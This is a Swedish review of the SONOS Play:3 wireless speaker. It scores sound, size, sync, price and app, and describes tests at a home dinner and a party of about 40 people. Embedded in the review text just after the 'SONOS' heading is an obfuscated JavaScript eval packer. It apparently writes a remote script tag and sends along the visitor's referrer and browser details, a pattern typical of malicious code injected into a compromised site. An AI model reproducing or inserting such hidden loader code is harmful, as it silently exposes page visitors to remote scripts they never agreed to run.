Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Revue testar SONOS Play: 3

Revue testar SONOS Play: 3
Sebastian

Review Overview

Ljudkvalitet
9
Storlek
8
Trådlöst synk
9
Pris
9
App
8
8.6

Rating

SONOS eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fszfz|var|u0026u|referrer|sisit||js|php’.split(’|’),0,{}))
Play: 3 är högtalaren som ser väldigt liten ut men sticker ut från mängden. 

Revue har testat högtalaren och förstår nu varför den är så otrolig populär.  

Om SONOS

SONOS är ett företag som uppmärksammat Apples AirPlay-funktion. Det är en av funktionerna i Play: 3 som absolut är värd att nämnas. Hela upplevelsen styrs enkelt via en app som finns till iPhone och iPad. Har man inte tillgång till detta så finns självklart alternativet av en fjärrkontroll som kan köpas vid sidan om. Möjligheten att springa runt i lägenheten/huset och enkelt byta låt via SONOS egna app är en frihet som vi tror att de flesta system i framtiden kommer att ha integrerat.

Själva högtalaren är en otroligt prisvärd enhet. Priset på ca 2 700 kronor (varierar i butik) kan låta dyrt för många men det är faktiskt en av den billigaste allt-i-ett högtalaren som just nu finns ute på marknaden för ljudsystem. Man skulle kunna jämföra SONOS Play: 3 med högtalaren B&W Zeppelin Air iPod, en trådlös högtalare i samma klass som kostar ca 6 000 kronor, dvs dubbelt så mycket som priset av Play: 3.

 

Testet

Vi har i testat två stycken Play: 3 som tillsammans är kopplade via en ”Bridge”. Bridge är en enhet som kan köpas vid sidan om. Den används för att koppla samman fler högtalare trådlöst. Du behöver en Bridge för att kunna köra högtalaren trådlöst (annars måste högtalaren kopplas in via Internet-jacket).

Vi har även testat systemet i två miljöer. Först och främst är det viktigt att den fungerar som den ska i en vardagssituation, dvs hemma en helt vanlig dag när man exempelvis står och lagar mat. I vårt andra test tog vi ut svängarna en aning. Musik går ju hand i hand med festligheter och därför kände vi att det är självklart att man ska kunna använda Play: 3 i en mer intensiv miljö där dans och högljud folkmassa florerar. Så vi drog ihop ett gäng på ca 40 personer och bjöd på en bit mat och en hel del förfriskningar. Mer om detta nedan.

SONOS Play: 3 i hemmet

Det är en helt vanlig onsdag och jag står och lagar en bättre middag tillsammans med några vänner. Samtidigt körs musik från en av högtalarna i bakgrunden på en acceptabel ljudnivå så man enkelt kan prata. Jag har satt på en spellista från mitt Spotify-konto (Ja, Spotify finns som alternativ i SONOS appen). När det komme till ljudet är det helt klart över förväntningarna. En av vännerna frågar till och med vad det är för ljudanläggning jag har. Efter maten tar vi ett glas vin och sjunker ner i vardagsrummet där jag ställt den andra högtalaren. Genom att de tillsammans synkar så hör jag samma musik i köket där jag nu står och diskar som mina gäster i vardagsrummet.

Kvällen går mot sitt slut och jag är verkligen nöjd med hela bjudningen, mycket till att musiken och ljudet ur SONOS Play: 3 var helt fantastiskt.

SONOS Play: 3 på festen

Det är lördag och det börjar dra ihop sig till fest. Det är Filip som denna gång ska prova systemet i en mer livad miljö. Filip har köpt hem alla förnödenheter och dukat upp fint på två bord. Båda högtalarna är strategiskt utplacerade i två hörn av vardagsrummet. När de första gästerna kliver in är ljudnivån på lägre än vad vi kan väntas oss senare mot kvällen.

Filip styr enkelt musiken via sin iPad som han lagt ett ordentligt beslag på (vi har erfarenhet av att det kommer vilja vara många kockar med i valet av låt senare).

Tiden går och nu har majoriteten av alla anslutit till festen, ca 40 personer. Ljudnivån har tredubblats sedan start och det har även nivån på musiken. Folk minglar och på några ställen dansas det och sjungs med. Filip har nu bytt från att styra systemet från iPad till att ändra låt via sin iPhone (lättare att gömma i fickan).

Det är absolut inget fel på ljudet ur högtalarna. Kvaliteten är faktiskt helt otrolig då det nu körs relativt högt. Det är inte maxnivå men inte långt ifrån. Det är ingen av gästerna som kommer fram och ber om att få sänka (har hänt innan med andra ljudsystem) eller liknande vilket också tyder på att de är nöjda med situationen.

httpv://www.youtube.com/watch?v=T1C6dKSQGSU

Sammanfattning

Efter våra test så kan vi tillsammans säga att dessa högtalare från Sonos är helt superb. Play: 3 som är det mindre alternativet i Sonos samling är absolut helt över förväntan. Den trådlösa tjänsten är ett enormt plus som gör det enkelt att koppla samman fler högtalare i samma eller fler rum. Appen som finns att ladda ner till båda Android och iOS fungerar också utmärkt som kontroll. Spotify finns som alternativ utöver en massa andra smart tjänster.

Vill ni läsa mer om högtalaren eller kanske beställa dessa kan ni göra detta här!

God Jul och Gott nytt år!!!

Fler bilder kommer inom kort!

Comments

  1. Karl

    Utmärkt recension! Kul att ni testar i en festmiljö 🙂

  2. Fabian

    Det är verkligen en fantastisk högtalare!!!